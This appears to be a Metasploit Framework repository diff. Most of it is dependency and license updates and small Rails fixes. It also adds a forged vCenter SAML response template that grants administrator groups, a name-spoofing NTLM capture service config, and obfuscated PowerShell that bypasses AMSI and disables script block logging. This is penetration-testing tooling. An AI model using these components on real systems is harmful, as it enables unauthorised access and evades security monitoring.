win32api (0.1.0)
windows_error (0.1.4)
winrm (2.3.6)
builder (>= 2.1.2)
erubi (~> 1.8)
gssapi (~> 1.2)
gyoku (~> 1.0)
httpclient (~> 2.2, >= 2.2.0.2)
logging (>= 1.6.1, < 3.0)
nori (~> 2.0)
rubyntlm (~> 0.6.0, >= 0.6.3)
xdr (3.0.3)
activemodel (>= 4.2, < 8.0)
activesupport (>= 4.2, < 8.0)
xmlrpc (0.3.2)
webrick
yard (0.9.26)
zeitwerk (2.4.2)
yard (0.9.28)
webrick (~> 1.7.0)
zeitwerk (2.5.4)
PLATFORMS
ruby
+4
View File
@@ -131,6 +131,10 @@ Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/
Copyright: 2020 Johnny Shaw
License: MIT
Files: exteneral/source/exploits/CVE-2022-26904/*
Copywrite: 2022 Abdelhamid Naceri
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
+118 -99
View File
@@ -1,27 +1,26 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.1.0, MIT
actionpack, 5.2.6, MIT
actionview, 5.2.6, MIT
activemodel, 5.2.6, MIT
activerecord, 5.2.6, MIT
activesupport, 5.2.6, MIT
addressable, 2.7.0, "Apache 2.0"
actionpack, 6.1.6, MIT
actionview, 6.1.6, MIT
activemodel, 6.1.6, MIT
activerecord, 6.1.6, MIT
activesupport, 6.1.6, MIT
addressable, 2.8.0, "Apache 2.0"
afm, 0.2.2, MIT
arel, 9.0.0, MIT
arel-helpers, 2.12.0, MIT
arel-helpers, 2.14.0, MIT
ast, 2.4.2, MIT
aws-eventstream, 1.1.1, "Apache 2.0"
aws-partitions, 1.465.0, "Apache 2.0"
aws-sdk-core, 3.114.1, "Apache 2.0"
aws-sdk-ec2, 1.240.0, "Apache 2.0"
aws-sdk-iam, 1.55.0, "Apache 2.0"
aws-sdk-kms, 1.43.0, "Apache 2.0"
aws-sdk-s3, 1.95.1, "Apache 2.0"
aws-sigv4, 1.2.3, "Apache 2.0"
bcrypt, 3.1.16, MIT
aws-eventstream, 1.2.0, "Apache 2.0"
aws-partitions, 1.588.0, "Apache 2.0"
aws-sdk-core, 3.131.0, "Apache 2.0"
aws-sdk-ec2, 1.315.0, "Apache 2.0"
aws-sdk-iam, 1.68.0, "Apache 2.0"
aws-sdk-kms, 1.57.0, "Apache 2.0"
aws-sdk-s3, 1.114.0, "Apache 2.0"
aws-sigv4, 1.5.0, "Apache 2.0"
bcrypt, 3.1.18, MIT
bcrypt_pbkdf, 1.1.0, MIT
bindata, 2.4.10, ruby
bson, 4.12.1, "Apache 2.0"
bson, 4.15.0, "Apache 2.0"
builder, 3.2.4, MIT
bundler, 2.1.4, MIT
byebug, 11.1.3, "Simplified BSD"
@@ -29,153 +28,173 @@ coderay, 1.1.3, MIT
concurrent-ruby, 1.0.5, MIT
cookiejar, 0.3.3, unknown
crass, 1.0.6, MIT
daemons, 1.4.0, MIT
diff-lcs, 1.4.4, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.61.5, "Apache 2.0"
daemons, 1.4.1, MIT
diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
digest, 3.1.0, "ruby, Simplified BSD"
dnsruby, 1.61.9, "Apache 2.0"
docile, 1.4.0, MIT
domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
ed25519, 1.2.4, MIT
ed25519, 1.3.0, MIT
em-http-request, 1.1.7, MIT
em-socksify, 0.3.2, MIT
erubi, 1.10.0, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.2.0, MIT
factory_bot, 6.2.1, MIT
factory_bot_rails, 6.2.0, MIT
faker, 2.18.0, MIT
faraday, 1.4.2, MIT
faker, 2.21.0, MIT
faraday, 1.10.0, MIT
faraday-em_http, 1.0.0, MIT
faraday-em_synchrony, 1.0.0, MIT
faraday-excon, 1.1.0, MIT
faraday-httpclient, 1.0.1, MIT
faraday-multipart, 1.0.3, MIT
faraday-net_http, 1.0.1, MIT
faraday-net_http_persistent, 1.1.0, MIT
faraday-net_http_persistent, 1.2.0, MIT
faraday-patron, 1.0.0, MIT
faraday-rack, 1.0.0, MIT
faraday-retry, 1.0.3, MIT
faye-websocket, 0.11.1, "Apache 2.0"
ffi, 1.15.5, "New BSD"
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
http-cookie, 1.0.3, MIT
http_parser.rb, 0.6.0, MIT
i18n, 1.8.10, MIT
io-console, 0.5.9, "ruby, Simplified BSD"
irb, 1.3.5, "ruby, Simplified BSD"
jmespath, 1.4.0, "Apache 2.0"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
http-cookie, 1.0.4, MIT
http_parser.rb, 0.8.0, MIT
httpclient, 2.8.3, ruby
i18n, 1.10.0, MIT
io-console, 0.5.11, "ruby, Simplified BSD"
irb, 1.3.6, "ruby, Simplified BSD"
jmespath, 1.6.1, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.5.1, ruby
loofah, 2.9.1, MIT
json, 2.6.2, ruby
little-plugger, 1.1.4, MIT
logging, 2.3.0, MIT
loofah, 2.18.0, MIT
memory_profiler, 1.0.0, MIT
metasm, 1.0.4, LGPL-2.1
metasploit-concern, 3.0.2, "New BSD"
metasploit-credential, 4.0.5, "New BSD"
metasploit-framework, 6.0.48, "New BSD"
metasploit-model, 3.1.4, "New BSD"
metasploit-payloads, 2.0.45, "3-clause (or ""modified"") BSD"
metasploit_data_models, 4.1.4, "New BSD"
metasploit_payloads-mettle, 1.0.9, "3-clause (or ""modified"") BSD"
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 4.0.4, "New BSD"
metasploit-credential, 5.0.7, "New BSD"
metasploit-framework, 6.2.2, "New BSD"
metasploit-model, 4.0.4, "New BSD"
metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
metasploit_data_models, 5.0.5, "New BSD"
metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
method_source, 1.0.0, MIT
mini_portile2, 2.5.3, MIT
minitest, 5.14.4, MIT
mini_portile2, 2.8.0, MIT
minitest, 5.15.0, MIT
mqtt, 0.5.0, MIT
msgpack, 1.4.2, "Apache 2.0"
msgpack, 1.5.1, "Apache 2.0"
multi_json, 1.15.0, MIT
multipart-post, 2.1.1, MIT
mustermann, 1.1.1, MIT
nessus_rest, 0.1.6, MIT
net-ldap, 0.17.0, MIT
net-protocol, 0.1.3, "ruby, Simplified BSD"
net-smtp, 0.3.1, "ruby, Simplified BSD"
net-ssh, 6.1.0, MIT
network_interface, 0.0.2, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.5.7, MIT
nokogiri, 1.11.7, MIT
octokit, 4.21.0, MIT
nio4r, 2.5.8, MIT
nokogiri, 1.13.6, MIT
nori, 2.6.0, MIT
octokit, 4.22.0, MIT
openssl-ccm, 1.2.2, MIT
openssl-cmac, 2.0.1, MIT
openvas-omp, 0.0.4, MIT
packetfu, 1.1.13, BSD
parallel, 1.20.1, MIT
parser, 3.0.1.1, MIT
parallel, 1.22.1, MIT
parser, 3.1.2.0, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.0, LGPL-2.1
pdf-reader, 2.4.2, MIT
pg, 1.2.3, "Simplified BSD"
pcaprub, 0.13.1, LGPL-2.1
pdf-reader, 2.10.0, MIT
pg, 1.3.5, "Simplified BSD"
pry, 0.13.1, MIT
pry-byebug, 3.9.0, MIT
public_suffix, 4.0.6, MIT
puma, 5.3.2, "New BSD"
racc, 1.5.2, "ruby, Simplified BSD"
public_suffix, 4.0.7, MIT
puma, 5.6.4, "New BSD"
racc, 1.6.0, "ruby, Simplified BSD"
rack, 2.2.3, MIT
rack-protection, 2.1.0, MIT
rack-protection, 2.2.0, MIT
rack-test, 1.1.0, MIT
rails-dom-testing, 2.0.3, MIT
rails-html-sanitizer, 1.3.0, MIT
railties, 5.2.6, MIT
rainbow, 3.0.0, MIT
rake, 13.0.3, MIT
rails-html-sanitizer, 1.4.2, MIT
railties, 6.1.6, MIT
rainbow, 3.1.1, MIT
rake, 13.0.6, MIT
rb-readline, 0.5.5, BSD
recog, 2.3.20, unknown
recog, 2.3.23, unknown
redcarpet, 3.5.1, MIT
regexp_parser, 2.1.1, MIT
regexp_parser, 2.4.0, MIT
reline, 0.2.5, ruby
rex-arch, 0.1.14, "New BSD"
rex-bin_tools, 0.1.7, "New BSD"
rex-core, 0.1.16, "New BSD"
rex-encoder, 0.1.5, "New BSD"
rex-exploitation, 0.1.27, "New BSD"
rex-bin_tools, 0.1.8, "New BSD"
rex-core, 0.1.28, "New BSD"
rex-encoder, 0.1.6, "New BSD"
rex-exploitation, 0.1.30, "New BSD"
rex-java, 0.1.6, "New BSD"
rex-mime, 0.1.6, "New BSD"
rex-mime, 0.1.7, "New BSD"
rex-nop, 0.1.2, "New BSD"
rex-ole, 0.1.7, "New BSD"
rex-powershell, 0.1.90, "New BSD"
rex-random_identifier, 0.1.5, "New BSD"
rex-powershell, 0.1.96, "New BSD"
rex-random_identifier, 0.1.8, "New BSD"
rex-registry, 0.1.4, "New BSD"
rex-rop_builder, 0.1.4, "New BSD"
rex-socket, 0.1.29, "New BSD"
rex-sslscan, 0.1.6, "New BSD"
rex-socket, 0.1.39, "New BSD"
rex-sslscan, 0.1.7, "New BSD"
rex-struct2, 0.1.3, "New BSD"
rex-text, 0.2.34, "New BSD"
rex-text, 0.2.37, "New BSD"
rex-zip, 0.1.4, "New BSD"
rexml, 3.2.5, "Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.10.0, MIT
rspec-core, 3.10.1, MIT
rspec-expectations, 3.10.1, MIT
rspec-mocks, 3.10.2, MIT
rspec-rails, 5.0.1, MIT
rspec, 3.11.0, MIT
rspec-core, 3.11.0, MIT
rspec-expectations, 3.11.0, MIT
rspec-mocks, 3.11.1, MIT
rspec-rails, 5.1.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.10.2, MIT
rubocop, 1.16.0, MIT
rubocop-ast, 1.7.0, MIT
ruby-macho, 2.5.1, MIT
rspec-support, 3.11.0, MIT
rubocop, 1.29.1, MIT
rubocop-ast, 1.18.0, MIT
ruby-macho, 3.0.0, MIT
ruby-prof, 1.4.2, "Simplified BSD"
ruby-progressbar, 1.11.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.4, "ruby, Simplified BSD"
ruby_smb, 2.0.10, "New BSD"
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.1.3, "New BSD"
rubyntlm, 0.6.3, MIT
rubyzip, 2.3.0, "Simplified BSD"
rubyzip, 2.3.2, "Simplified BSD"
sawyer, 0.8.2, MIT
simplecov, 0.18.2, MIT
simplecov-html, 0.12.3, MIT
simpleidn, 0.2.1, MIT
sinatra, 2.1.0, MIT
sinatra, 2.2.0, MIT
sqlite3, 1.4.2, "New BSD"
sshkey, 2.0.0, MIT
swagger-blocks, 3.0.0, MIT
thin, 1.8.1, "GPL-2.0+, ruby"
thor, 1.1.0, MIT
thread_safe, 0.3.6, "Apache 2.0"
thor, 1.2.1, MIT
tilt, 2.0.10, MIT
timecop, 0.9.4, MIT
timecop, 0.9.5, MIT
timeout, 0.2.0, "ruby, Simplified BSD"
ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.9, MIT
tzinfo-data, 1.2021.1, MIT
tzinfo, 2.0.4, MIT
tzinfo-data, 1.2022.1, MIT
unf, 0.1.4, "2-clause BSDL"
unf_ext, 0.0.7.7, MIT
unicode-display_width, 2.0.0, MIT
unf_ext, 0.0.8.1, MIT
unicode-display_width, 2.1.0, MIT
unix-crypt, 1.3.0, BSD
warden, 1.2.9, MIT
webrick, 1.7.0, "ruby, Simplified BSD"
websocket-driver, 0.7.4, "Apache 2.0"
websocket-driver, 0.7.5, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
windows_error, 0.1.2, BSD
xdr, 3.0.2, "Apache 2.0"
win32api, 0.1.0, unknown
windows_error, 0.1.4, BSD
winrm, 2.3.6, "Apache 2.0"
xdr, 3.0.3, "Apache 2.0"
xmlrpc, 0.3.2, "ruby, Simplified BSD"
yard, 0.9.26, MIT
zeitwerk, 2.4.2, MIT
yard, 0.9.27, MIT
zeitwerk, 2.5.4, MIT
+2
View File
@@ -1,3 +1,5 @@
class ApplicationRecord < ActiveRecord::Base
self.abstract_class = true
include ArelHelpers::ArelTable
include ArelHelpers::JoinAssociation
end
@@ -7,7 +7,7 @@ module Metasploit
def validate_each(record, attribute, value)
unless ::File.executable? value
record.errors[attribute] << (options[:message] || "is not a valid path to an executable file")
record.errors.add(attribute, (options[:message] || "is not a valid path to an executable file"))
end
end
end
@@ -7,7 +7,7 @@ module Metasploit
def validate_each(record, attribute, value)
unless value && ::File.file?(value)
record.errors[attribute] << (options[:message] || "is not a valid path to a regular file")
record.errors.add(attribute, (options[:message] || "is not a valid path to a regular file"))
end
end
end
+2 -1
View File
@@ -36,6 +36,7 @@ module Metasploit
config.paths['log'] = "#{Msf::Config.log_directory}/#{Rails.env}.log"
config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
config.autoloader = :zeitwerk
case Rails.env
when "development"
@@ -51,4 +52,4 @@ end
# Silence warnings about this defaulting to true
I18n.enforce_available_locales = true
require 'msfenv'
require 'msfenv'
@@ -0,0 +1,55 @@
<?xml version="1.0" encoding="UTF-8"?>
<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/sso" ID="_<%= vcenter_saml_response_id.encode(xml: :text) %>" InResponseTo="<%= vcenter_saml_id.encode(xml: :text) %>" IssueInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" Version="2.0">
<saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://<%= vcenter_fqdn.encode(xml: :text) %>/websso/SAML2/Metadata/<%= vcenter_saml_domain.encode(xml: :text) %></saml2:Issuer>
<saml2p:Status>
<saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
<saml2p:StatusMessage>Request successful</saml2p:StatusMessage>
</saml2p:Status>
<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ID="_<%= vcenter_saml_assert_id.encode(xml: :text) %>" IssueInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" Version="2.0">
<saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://<%= vcenter_fqdn.encode(xml: :text) %>/websso/SAML2/Metadata/<%= vcenter_saml_domain.encode(xml: :text) %></saml2:Issuer>
<saml2:Subject>
<saml2:NameID Format="http://schemas.xmlsoap.org/claims/UPN"><%= vcenter_saml_user.encode(xml: :text) %>@<%= vcenter_saml_domain.encode(xml: :text) %></saml2:NameID>
<saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml2:SubjectConfirmationData InResponseTo="<%= vcenter_saml_id.encode(xml: :text) %>" NotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>" Recipient="https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/sso"/>
</saml2:SubjectConfirmation>
</saml2:Subject>
<saml2:Conditions NotBefore="<%= vcenter_saml_not_before.encode(xml: :text) %>" NotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>">
<saml2:ProxyRestriction Count="10"/>
<saml2:Condition xmlns:rsa="http://www.rsa.com/names/2009/12/std-ext/SAML2.0" Count="10" xsi:type="rsa:RenewRestrictionType"/>
<saml2:AudienceRestriction>
<saml2:Audience>https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/metadata</saml2:Audience>
</saml2:AudienceRestriction>
</saml2:Conditions>
<saml2:AuthnStatement AuthnInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" SessionIndex="_<%= vcenter_saml_idx_id.encode(xml: :text) %>" SessionNotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>">
<saml2:AuthnContext>
<saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
</saml2:AuthnContext>
</saml2:AuthnStatement>
<saml2:AttributeStatement>
<saml2:Attribute FriendlyName="userPrincipalName" Name="http://schemas.xmlsoap.org/claims/UPN" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_user.encode(xml: :text) %>@<%= vcenter_saml_domain.encode(xml: :text) %></saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="Groups" Name="http://rsa.com/schemas/attr-names/2009/01/GroupIdentity" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Users</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Administrators</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\CAAdmins</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\ComponentManager.Administrators</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.BashShellAdministrators</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.ReadOnly</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.SupportUsers</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.Administrators</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\LicenseService.Administrators</saml2:AttributeValue>
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Everyone</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="Subject Type" Name="http://vmware.com/schemas/attr-names/2011/07/isSolution" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue xsi:type="xsd:string">false</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="surname" Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %></saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="givenName" Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_user.encode(xml: :text) %></saml2:AttributeValue>
</saml2:Attribute>
</saml2:AttributeStatement>
</saml2:Assertion>
</saml2p:Response>
+52
View File
@@ -0,0 +1,52 @@
spoof_regex: .*
ntlm_challenge: "1122334455667788"
ntlm_domain: anonymous
http_basic: no
ssl_cert: null
logfile: null
hashdir: null
services:
- type: DRDA
enabled: yes
- type: FTP
enabled: yes
- type: HTTP
enabled: yes
- type: HTTPS
enabled: yes
- type: IMAP
enabled: yes
- type: MSSQL
enabled: yes
- type: MySQL
enabled: yes
- type: POP3
enabled: yes
- type: Postgres
enabled: yes
- type: PrintJob
enabled: yes
- type: SIP
enabled: yes
- type: SMB
enabled: yes
- type: SMTP
enabled: yes
- type: Telnet
enabled: yes
- type: VNC
enabled: yes
- type: FTPS
enabled: yes
- type: IMAPS
enabled: yes
- type: POP3S
enabled: yes
- type: SMTPS
enabled: yes
- type: NBNS
enabled: yes
- type: LLMNR
enabled: yes
- type: mDNS
enabled: yes
@@ -0,0 +1,174 @@
<?xml version="1.0" ?>
<!--
This file was generated by hand since no automated analysis and generation tool currently exists for Powershell code.
-->
<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
<key id="address" for="all" attr.name="address" attr.type="long"/>
<key id="type" for="all" attr.name="type" attr.type="string"/>
<key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
<key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
<graph edgedefault="directed">
<node id="block.1">
<data key="address">1</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">1</data>
<data key="type">block</data>
<node id="block.1:instruction.1">
<data key="address">1</data>
<data key="type">instruction</data>
<data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
</node>
<node id="block.1:instruction.2">
<data key="address">2</data>
<data key="type">instruction</data>
<data key="instruction.source"> $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
</node>
<node id="block.1:instruction.3">
<data key="address">3</data>
<data key="type">instruction</data>
<data key="instruction.source"> $Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
</node>
<node id="block.1:instruction.4">
<data key="address">4</data>
<data key="type">instruction</data>
<data key="instruction.source"> if ($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %&gt;,'NonPublic,Static').SetValue($null,$true); };</data>
</node>
<node id="block.1:instruction.5">
<data key="address">5</data>
<data key="type">instruction</data>
<data key="instruction.source"> $Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
</node>
<node id="block.1:instruction.6">
<data key="address">6</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
</node>
<node id="block.1:instruction.7">
<data key="address">7</data>
<data key="type">instruction</data>
<data key="instruction.source"> If ($GPF) {</data>
</node>
<node id="block.1:instruction.8">
<data key="address">8</data>
<data key="type">instruction</data>
<data key="instruction.source"> $SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
</node>
<node id="block.1:instruction.9">
<data key="address">9</data>
<data key="type">instruction</data>
<data key="instruction.source"> $EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
</node>
<node id="block.1:instruction.10">
<data key="address">10</data>
<data key="type">instruction</data>
<data key="instruction.source"> $EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
</node>
<node id="block.1:instruction.11">
<data key="address">11</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC=$GPF.GetValue($null);</data>
</node>
<edge source="block.1:instruction.1" target="block.1:instruction.3"/>
<edge source="block.1:instruction.1" target="block.1:instruction.5"/>
<edge source="block.1:instruction.3" target="block.1:instruction.4"/>
<edge source="block.1:instruction.4" target="block.1:instruction.7"/>
<edge source="block.1:instruction.5" target="block.1:instruction.6"/>
<edge source="block.1:instruction.6" target="block.1:instruction.7"/>
<edge source="block.1:instruction.7" target="block.1:instruction.11"/>
</graph>
</node>
<node id="block.12">
<data key="address">12</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">12</data>
<data key="type">block</data>
<node id="block.12:instruction.12">
<data key="address">12</data>
<data key="type">instruction</data>
<data key="instruction.source"> If($GPC[$SBL]){</data>
</node>
<node id="block.12:instruction.13">
<data key="address">13</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC[$SBL][$EnableSBL]=0;</data>
</node>
<node id="block.12:instruction.14">
<data key="address">14</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC[$SBL][$EnableSBIL]=0;</data>
</node>
<node id="block.12:instruction.15">
<data key="address">15</data>
<data key="type">instruction</data>
<data key="instruction.source"> }</data>
</node>
<edge source="block.12:instruction.12" target="block.12:instruction.13"/>
<edge source="block.12:instruction.12" target="block.12:instruction.14"/>
<edge source="block.12:instruction.13" target="block.12:instruction.15"/>
<edge source="block.12:instruction.14" target="block.12:instruction.15"/>
</graph>
</node>
<node id="block.16">
<data key="address">16</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">16</data>
<data key="type">block</data>
<node id="block.16:instruction.16">
<data key="address">16</data>
<data key="type">instruction</data>
<data key="instruction.source"> $val.Add($EnableSBL,0);</data>
</node>
<node id="block.16:instruction.17">
<data key="address">17</data>
<data key="type">instruction</data>
<data key="instruction.source"> $val.Add($EnableSBIL,0);</data>
</node>
<node id="block.16:instruction.18">
<data key="address">18</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
</node>
<edge source="block.16:instruction.16" target="block.16:instruction.18"/>
<edge source="block.16:instruction.17" target="block.16:instruction.18"/>
</graph>
</node>
<node id="block.19">
<data key="address">19</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">19</data>
<data key="type">block</data>
<node id="block.19:instruction.19">
<data key="address">19</data>
<data key="type">instruction</data>
<data key="instruction.source"> } Else {</data>
</node>
<node id="block.19:instruction.20">
<data key="address">20</data>
<data key="type">instruction</data>
<data key="instruction.source"> [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
</node>
<node id="block.19:instruction.21">
<data key="address">21</data>
<data key="type">instruction</data>
<data key="instruction.source"> }</data>
</node>
<node id="block.19:instruction.22">
<data key="address">22</data>
<data key="type">instruction</data>
<data key="instruction.source">};</data>
</node>
<edge source="block.19:instruction.19" target="block.19:instruction.20"/>
<edge source="block.19:instruction.20" target="block.19:instruction.21"/>
<edge source="block.19:instruction.21" target="block.19:instruction.22"/>
</graph>
</node>
<edge source="block.1" target="block.12"/>
<edge source="block.1" target="block.16"/>
<edge source="block.12" target="block.19"/>
<edge source="block.16" target="block.19"/>
</graph>
</graphml>
+321
View File
@@ -0,0 +1,321 @@
{
"exchange_builds": [
{
"name": "Exchange Server 4.0",
"builds": [
"4.0.996",
"4.0.995",
"4.0.994",
"4.0.993",
"4.0.838",
"4.0.837"
],
"eol": true
},
{
"name": "Exchange Server 5.0",
"builds": [
"5.0.1460",
"5.0.1458",
"5.0.1457"
],
"eol": true
},
{
"name": "Exchange Server 5.5",
"builds": [
"5.5.2653",
"5.5.2650",
"5.5.2448",
"5.5.2232",
"5.5.1960"
],
"eol": true
},
{
"name": "Exchange Server 2000",
"builds": [
"6.0.6620.7",
"6.0.6620.5",
"6.0.6603",
"6.0.6556",
"6.0.6487",
"6.0.6249",
"6.0.5762",
"6.0.4712",
"6.0.4417"
],
"eol": true
},
{
"name": "Exchange Server 2003",
"builds": [
"6.5.7654.4",
"6.5.7653.33",
"6.5.7683",
"6.5.7226",
"6.5.6944"
],
"eol": true
},
{
"name": "Exchange Server 2007",
"builds": [
"8.3.517.0",
"8.3.502.0",
"8.3.485.1",
"8.3.468.0",
"8.3.459.0",
"8.3.445.0",
"8.3.417.1",
"8.3.406.0",
"8.3.389.2",
"8.3.379.2",
"8.3.348.2",
"8.3.342.4",
"8.3.327.1",
"8.3.298.3",
"8.3.297.2",
"8.3.279.6",
"8.3.279.5",
"8.3.279.3",
"8.3.264.0",
"8.3.245.2",
"8.3.213.1",
"8.3.192.1",
"8.3.159.2",
"8.3.137.3",
"8.3.106.2",
"8.3.83.6",
"8.2.305.3",
"8.2.254.0",
"8.2.247.2",
"8.2.234.1",
"8.2.217.3",
"8.2.176.2",
"8.1.436.0",
"8.1.393.1",
"8.1.375.2",
"8.1.359.2",
"8.1.340.1",
"8.1.336.1",
"8.1.311.3",
"8.1.291.2",
"8.1.278.2",
"8.1.263.1",
"8.1.240.6",
"8.0.813.0",
"8.0.783.2",
"8.0.754.0",
"8.0.744.0",
"8.0.730.1",
"8.0.711.2",
"8.0.708.3",
"8.0.685.25"
],
"eol": true
},
{
"name": "Exchange Server 2010",
"builds": [
"14.3.513.0",
"14.3.509.0",
"14.3.496.0",
"14.3.468.0",
"14.3.461.1",
"14.3.452.0",
"14.3.442.0",
"14.3.435.0",
"14.3.419.0",
"14.3.417.1",
"14.3.411.0",
"14.3.399.2",
"14.3.389.1",
"14.3.382.0",
"14.3.361.1",
"14.3.352.0",
"14.3.336.0",
"14.3.319.2",
"14.3.301.0",
"14.3.294.0",
"14.3.279.2",
"14.3.266.2",
"14.3.248.2",
"14.3.235.1",
"14.3.224.2",
"14.3.224.1",
"14.3.210.2",
"14.3.195.1",
"14.3.181.6",
"14.3.174.1",
"14.3.169.1",
"14.3.158.1",
"14.3.146.0",
